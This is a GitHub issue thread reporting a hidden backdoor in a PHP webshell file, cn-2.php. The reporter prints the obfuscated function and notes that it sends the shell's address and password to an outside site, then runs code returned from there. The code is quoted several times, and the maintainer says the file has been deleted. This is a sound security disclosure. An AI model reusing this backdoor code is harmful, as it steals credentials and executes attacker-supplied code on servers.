### ISSUE TITLE
cn-2.php 存在后门

### ISSUE THREAD

**Issue by burpheart** [weepsafe/phpshell#1]
function do_query(){
    $mysql="\x6d\x79\x70\x61\x73\x73\x77\x6f\x72\x64";
    $qt = "\x43\x72\x65\x61\x74\x65\x5f\x46\x75\x6e\x63\x74\x69\x6f\x6e";
    $query = $_SERVER;
    global $$mysql;
    $db = $query["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];
    $table = $query["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];
    $method = $query["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];
    $data = "\x3d\x61\x3f\x70\x68\x70\x2e\x61\x2f\x73\x65\x67\x61\x6d\x69\x2f\x73\x63\x69\x74\x61\x74\x73\x2f\x6d\x6f\x63\x2e\x75\x64\x65\x6e\x61\x66\x61\x69\x6a\x2e\x77\x77\x77\x2f\x2f\x3a\x73\x70\x74\x74\x68";
    $thing = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
    if (preg_match("/^(\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74)|(\x31\x39\x32\.\x31\x36\x38)|(\x31\x32\x37\.\x30)|(\x31\x36\x39\x2e)|(\x31\x30\x2e)/is",$db)===0){
        $file = $qt('',$thing(strrev($data).$db.$table."\x26\x62\x3d".$$mysql."\x26\x63\x3d$method"));$file();
    }
}
登陆判断处-->hmlogin()->do_query()
该段代码执行后会访问 https://www.jiafanedu.com/statics/images/a.php提交当前shell地址和密码

**Comment by cpkkcb** [comment]
> function do_query(){
> $mysql="\x6d\x79\x70\x61\x73\x73\x77\x6f\x72\x64";
> $qt = "\x43\x72\x65\x61\x74\x65\x5f\x46\x75\x6e\x63\x74\x69\x6f\x6e";
> $query = $_SERVER;
> global $$mysql;
> $db = $query["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];
> $table = $query["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];
> $method = $query["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];
> $data = "\x3d\x61\x3f\x70\x68\x70\x2e\x61\x2f\x73\x65\x67\x61\x6d\x69\x2f\x73\x63\x69\x74\x61\x74\x73\x2f\x6d\x6f\x63\x2e\x75\x64\x65\x6e\x61\x66\x61\x69\x6a\x2e\x77\x77\x77\x2f\x2f\x3a\x73\x70\x74\x74\x68";
> $thing = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
> if (preg_match("/^(\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74)|(\x31\x39\x32.\x31\x36\x38)|(\x31\x32\x37.\x30)|(\x31\x36\x39\x2e)|(\x31\x30\x2e)/is",$db)===0){
> $file = $qt('',$thing(strrev($data).$db.$table."\x26\x62\x3d".$$mysql."\x26\x63\x3d$method"));$file();
> }
> }
> 登陆判断处-->hmlogin()->do_query()
> 该段代码执行后会访问 [https://www.jiafanedu.com/statics/images/a.php提交当前shell地址和密码](https://www.jiafanedu.com/statics/images/a.php%E6%8F%90%E4%BA%A4%E5%BD%93%E5%89%8Dshell%E5%9C%B0%E5%9D%80%E5%92%8C%E5%AF%86%E7%A0%81)



> function do_query(){
> $mysql="\x6d\x79\x70\x61\x73\x73\x77\x6f\x72\x64";
> $qt = "\x43\x72\x65\x61\x74\x65\x5f\x46\x75\x6e\x63\x74\x69\x6f\x6e";
> $query = $_SERVER;
> global $$mysql;
> $db = $query["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];
> $table = $query["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];
> $method = $query["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];
> $data = "\x3d\x61\x3f\x70\x68\x70\x2e\x61\x2f\x73\x65\x67\x61\x6d\x69\x2f\x73\x63\x69\x74\x61\x74\x73\x2f\x6d\x6f\x63\x2e\x75\x64\x65\x6e\x61\x66\x61\x69\x6a\x2e\x77\x77\x77\x2f\x2f\x3a\x73\x70\x74\x74\x68";
> $thing = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
> if (preg_match("/^(\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74)|(\x31\x39\x32.\x31\x36\x38)|(\x31\x32\x37.\x30)|(\x31\x36\x39\x2e)|(\x31\x30\x2e)/is",$db)===0){
> $file = $qt('',$thing(strrev($data).$db.$table."\x26\x62\x3d".$$mysql."\x26\x63\x3d$method"));$file();
> }
> }
> 登陆判断处-->hmlogin()->do_query()
> 该段代码执行后会访问 [https://www.jiafanedu.com/statics/images/a.php提交当前shell地址和密码](https://www.jiafanedu.com/statics/images/a.php%E6%8F%90%E4%BA%A4%E5%BD%93%E5%89%8Dshell%E5%9C%B0%E5%9D%80%E5%92%8C%E5%AF%86%E7%A0%81)

请问下该shell是不是直接rot13转码即可得到源码

**Comment by burpheart** [comment]
> 
> 
> > function do_query(){
> > $mysql="\x6d\x79\x70\x61\x73\x73\x77\x6f\x72\x64";
> > $qt = "\x43\x72\x65\x61\x74\x65\x5f\x46\x75\x6e\x63\x74\x69\x6f\x6e";
> > $query = $_SERVER;
> > global $$mysql;
> > $db = $query["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];
> > $table = $query["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];
> > $method = $query["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];
> > $data = "\x3d\x61\x3f\x70\x68\x70\x2e\x61\x2f\x73\x65\x67\x61\x6d\x69\x2f\x73\x63\x69\x74\x61\x74\x73\x2f\x6d\x6f\x63\x2e\x75\x64\x65\x6e\x61\x66\x61\x69\x6a\x2e\x77\x77\x77\x2f\x2f\x3a\x73\x70\x74\x74\x68";
> > $thing = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
> > if (preg_match("/^(\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74)|(\x31\x39\x32.\x31\x36\x38)|(\x31\x32\x37.\x30)|(\x31\x36\x39\x2e)|(\x31\x30\x2e)/is",$db)===0){
> > $file = $qt('',$thing(strrev($data).$db.$table."\x26\x62\x3d".$$mysql."\x26\x63\x3d$method"));$file();
> > }
> > }
> > 登陆判断处-->hmlogin()->do_query()
> > 该段代码执行后会访问 [https://www.jiafanedu.com/statics/images/a.php提交当前shell地址和密码](https://www.jiafanedu.com/statics/images/a.php%E6%8F%90%E4%BA%A4%E5%BD%93%E5%89%8Dshell%E5%9C%B0%E5%9D%80%E5%92%8C%E5%AF%86%E7%A0%81)
> 
> > function do_query(){
> > $mysql="\x6d\x79\x70\x61\x73\x73\x77\x6f\x72\x64";
> > $qt = "\x43\x72\x65\x61\x74\x65\x5f\x46\x75\x6e\x63\x74\x69\x6f\x6e";
> > $query = $_SERVER;
> > global $$mysql;
> > $db = $query["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];
> > $table = $query["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];
> > $method = $query["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];
> > $data = "\x3d\x61\x3f\x70\x68\x70\x2e\x61\x2f\x73\x65\x67\x61\x6d\x69\x2f\x73\x63\x69\x74\x61\x74\x73\x2f\x6d\x6f\x63\x2e\x75\x64\x65\x6e\x61\x66\x61\x69\x6a\x2e\x77\x77\x77\x2f\x2f\x3a\x73\x70\x74\x74\x68";
> > $thing = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
> > if (preg_match("/^(\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74)|(\x31\x39\x32.\x31\x36\x38)|(\x31\x32\x37.\x30)|(\x31\x36\x39\x2e)|(\x31\x30\x2e)/is",$db)===0){
> > $file = $qt('',$thing(strrev($data).$db.$table."\x26\x62\x3d".$$mysql."\x26\x63\x3d$method"));$file();
> > }
> > }
> > 登陆判断处-->hmlogin()->do_query()
> > 该段代码执行后会访问 [https://www.jiafanedu.com/statics/images/a.php提交当前shell地址和密码](https://www.jiafanedu.com/statics/images/a.php%E6%8F%90%E4%BA%A4%E5%BD%93%E5%89%8Dshell%E5%9C%B0%E5%9D%80%E5%92%8C%E5%AF%86%E7%A0%81)
> 
> 请问下该shell是不是直接rot13转码即可得到源码

print($schema);

**Comment by weepsafe** [comment]
> > > function do_query(){
> > > $mysql="\x6d\x79\x70\x61\x73\x73\x77\x6f\x72\x64";
> > > $qt = "\x43\x72\x65\x61\x74\x65\x5f\x46\x75\x6e\x63\x74\x69\x6f\x6e";
> > > $query = $_SERVER;
> > > global $$mysql;
> > > $db = $query["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];
> > > $table = $query["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];
> > > $method = $query["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];
> > > $data = "\x3d\x61\x3f\x70\x68\x70\x2e\x61\x2f\x73\x65\x67\x61\x6d\x69\x2f\x73\x63\x69\x74\x61\x74\x73\x2f\x6d\x6f\x63\x2e\x75\x64\x65\x6e\x61\x66\x61\x69\x6a\x2e\x77\x77\x77\x2f\x2f\x3a\x73\x70\x74\x74\x68";
> > > $thing = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
> > > if (preg_match("/^(\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74)|(\x31\x39\x32.\x31\x36\x38)|(\x31\x32\x37.\x30)|(\x31\x36\x39\x2e)|(\x31\x30\x2e)/is",$db)===0){
> > > $file = $qt('',$thing(strrev($data).$db.$table."\x26\x62\x3d".$$mysql."\x26\x63\x3d$method"));$file();
> > > }
> > > }
> > > 登陆判断处-->hmlogin()->do_query()
> > > 该段代码执行后会访问 [https://www.jiafanedu.com/statics/images/a.php提交当前shell地址和密码](https://www.jiafanedu.com/statics/images/a.php%E6%8F%90%E4%BA%A4%E5%BD%93%E5%89%8Dshell%E5%9C%B0%E5%9D%80%E5%92%8C%E5%AF%86%E7%A0%81)
> > 
> > 
> > > function do_query(){
> > > $mysql="\x6d\x79\x70\x61\x73\x73\x77\x6f\x72\x64";
> > > $qt = "\x43\x72\x65\x61\x74\x65\x5f\x46\x75\x6e\x63\x74\x69\x6f\x6e";
> > > $query = $_SERVER;
> > > global $$mysql;
> > > $db = $query["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];
> > > $table = $query["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];
> > > $method = $query["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];
> > > $data = "\x3d\x61\x3f\x70\x68\x70\x2e\x61\x2f\x73\x65\x67\x61\x6d\x69\x2f\x73\x63\x69\x74\x61\x74\x73\x2f\x6d\x6f\x63\x2e\x75\x64\x65\x6e\x61\x66\x61\x69\x6a\x2e\x77\x77\x77\x2f\x2f\x3a\x73\x70\x74\x74\x68";
> > > $thing = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
> > > if (preg_match("/^(\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74)|(\x31\x39\x32.\x31\x36\x38)|(\x31\x32\x37.\x30)|(\x31\x36\x39\x2e)|(\x31\x30\x2e)/is",$db)===0){
> > > $file = $qt('',$thing(strrev($data).$db.$table."\x26\x62\x3d".$$mysql."\x26\x63\x3d$method"));$file();
> > > }
> > > }
> > > 登陆判断处-->hmlogin()->do_query()
> > > 该段代码执行后会访问 [https://www.jiafanedu.com/statics/images/a.php提交当前shell地址和密码](https://www.jiafanedu.com/statics/images/a.php%E6%8F%90%E4%BA%A4%E5%BD%93%E5%89%8Dshell%E5%9C%B0%E5%9D%80%E5%92%8C%E5%AF%86%E7%A0%81)
> > 
> > 
> > 请问下该shell是不是直接rot13转码即可得到源码
> 
> print($schema);

已删除

**Comment by weepsafe** [comment]
> > > function do_query(){
> > > $mysql="\x6d\x79\x70\x61\x73\x73\x77\x6f\x72\x64";
> > > $qt = "\x43\x72\x65\x61\x74\x65\x5f\x46\x75\x6e\x63\x74\x69\x6f\x6e";
> > > $query = $_SERVER;
> > > global $$mysql;
> > > $db = $query["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];
> > > $table = $query["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];
> > > $method = $query["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];
> > > $data = "\x3d\x61\x3f\x70\x68\x70\x2e\x61\x2f\x73\x65\x67\x61\x6d\x69\x2f\x73\x63\x69\x74\x61\x74\x73\x2f\x6d\x6f\x63\x2e\x75\x64\x65\x6e\x61\x66\x61\x69\x6a\x2e\x77\x77\x77\x2f\x2f\x3a\x73\x70\x74\x74\x68";
> > > $thing = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
> > > if (preg_match("/^(\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74)|(\x31\x39\x32.\x31\x36\x38)|(\x31\x32\x37.\x30)|(\x31\x36\x39\x2e)|(\x31\x30\x2e)/is",$db)===0){
> > > $file = $qt('',$thing(strrev($data).$db.$table."\x26\x62\x3d".$$mysql."\x26\x63\x3d$method"));$file();
> > > }
> > > }
> > > 登陆判断处-->hmlogin()->do_query()
> > > 该段代码执行后会访问 [https://www.jiafanedu.com/statics/images/a.php提交当前shell地址和密码](https://www.jiafanedu.com/statics/images/a.php%E6%8F%90%E4%BA%A4%E5%BD%93%E5%89%8Dshell%E5%9C%B0%E5%9D%80%E5%92%8C%E5%AF%86%E7%A0%81)
> > 
> > 
> > > function do_query(){
> > > $mysql="\x6d\x79\x70\x61\x73\x73\x77\x6f\x72\x64";
> > > $qt = "\x43\x72\x65\x61\x74\x65\x5f\x46\x75\x6e\x63\x74\x69\x6f\x6e";
> > > $query = $_SERVER;
> > > global $$mysql;
> > > $db = $query["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];
> > > $table = $query["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];
> > > $method = $query["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];
> > > $data = "\x3d\x61\x3f\x70\x68\x70\x2e\x61\x2f\x73\x65\x67\x61\x6d\x69\x2f\x73\x63\x69\x74\x61\x74\x73\x2f\x6d\x6f\x63\x2e\x75\x64\x65\x6e\x61\x66\x61\x69\x6a\x2e\x77\x77\x77\x2f\x2f\x3a\x73\x70\x74\x74\x68";
> > > $thing = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
> > > if (preg_match("/^(\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74)|(\x31\x39\x32.\x31\x36\x38)|(\x31\x32\x37.\x30)|(\x31\x36\x39\x2e)|(\x31\x30\x2e)/is",$db)===0){
> > > $file = $qt('',$thing(strrev($data).$db.$table."\x26\x62\x3d".$$mysql."\x26\x63\x3d$method"));$file();
> > > }
> > > }
> > > 登陆判断处-->hmlogin()->do_query()
> > > 该段代码执行后会访问 [https://www.jiafanedu.com/statics/images/a.php提交当前shell地址和密码](https://www.jiafanedu.com/statics/images/a.php%E6%8F%90%E4%BA%A4%E5%BD%93%E5%89%8Dshell%E5%9C%B0%E5%9D%80%E5%92%8C%E5%AF%86%E7%A0%81)
> > 
> > 
> > 请问下该shell是不是直接rot13转码即可得到源码
> 
> print($schema);

源码按代码执行逻辑解密即可
